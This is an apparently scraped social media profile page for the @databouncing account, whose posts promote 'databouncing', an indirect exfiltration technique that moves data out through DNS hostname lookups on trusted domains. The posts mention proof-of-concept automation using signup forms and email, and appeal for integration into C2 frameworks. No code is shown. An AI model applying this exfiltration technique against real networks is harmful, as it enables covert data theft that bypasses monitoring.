Olivia
Online
Databouncing
@databouncing
databouncing is the art of indirect exfiltration using hostname lookups as a transport medium - click the link, snoop around.
United Kingdom
Joined April 2024
20 Following
43 Followers
53 Posts
Pinned Tweet
A little thread on the concern set of data-bouncing,
The most important component here is that the exfil is second order, also known as indirect, this means you can’t control it within your network, while many refer to it as a DNS exfil, that’s only the second leg, 1/*
Some good insight from @DidierStevens https://t.co/yFFLXovimX could be useful to make life harder where it fails (as a benifit) in databouncing
Approved 🫡
Been building on this idea https://t.co/9g4UmKZZeS
Using signup forms for databounce/data exfil
Got the POC working: Playwright automation to register emails, triggers DNS lookups -> my listener catches + send the file to a Discord webhook.
data-exfil using facebook reg :D!
Hmmm Databouncing + Fastflux, hmmmm
@elonmusk Too huh ? 😂
If you want to databounce via email https://t.co/LG9GjiqjxZ
This is crude but functional
It will use the hostname space as you’d expect, 500 recipients per send
@SwiftOnSecurity Ubi looks great but, looks locked in, synology has a good balance of flexibility and integration (just doesnt have that slick ubi UX)
we feel that the only reason Databouncing hasn’t gotten the attention it deserves is because the PoCs have mostly been fun demonstrations of its capability - if you could share for reach 🙌❤️ 4/4
A little bit of positive downtime, and we’re back at it
We’re looking for some assistance in building databouncing integration into C2 frameworks (Sliver, Tuoni, Merlin, others ?)
1/4
I’d be happy putting a reward out for whoever authors something stable first, you’d get support from myself @DeathsPirate and @N1ckDunn where we have time 3/4
https://t.co/G8cHyDMzzc great for businesses, and databouncing aficionados ?
While databouncing is pretty unstoppable in most cases it’s always nice if you’re gifted even more:
PAN-234015
The X-Forwarded-For (XFF) value is not displayed in traffic logs.
I'll be speaking at Defcon Gloucester this evening on all things @databouncing. Hopefully see some of you later!
Seeing lots of databouncing candidates on Chinese infrastructure 🥸
Ayo #bugbounty hunters, you want to squeeze some money out of those lame host header poisonings ? Check out CWE-441 - then check out #databouncing - all you have to do is argue with triage until you are a millionaire 😁🫡
@teamcymru_S2 do you fancy a run at countermeasures ?
without actually putting any data on any services of those domains, this is industrialized exfiltration and no one seems to have an answer.
@Microsoft asked us to refer to @Akamai when we demo'd Databouncing through their domains, Akamai's guy said essentially 'that's how the internet works', what's interesting is that when we spoke to NSA it was suggested that @Cloudflare had a response
There are some very real implications to this technique and the reason we put time and money into building https://t.co/TWWq4yPk8c was to force the conversation not being had. - we'll start chipping away visually demonstrating how to move files via trusted domains...
Last Seen Users on Sotwe
Trends for you
Most Popular Users
Elon Musk 
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.4M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.1M followers
Taylor Swift
@taylorswift13
80.9M followers
Lady Gaga
@ladygaga
72.4M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
68.9M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.5M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.2M followers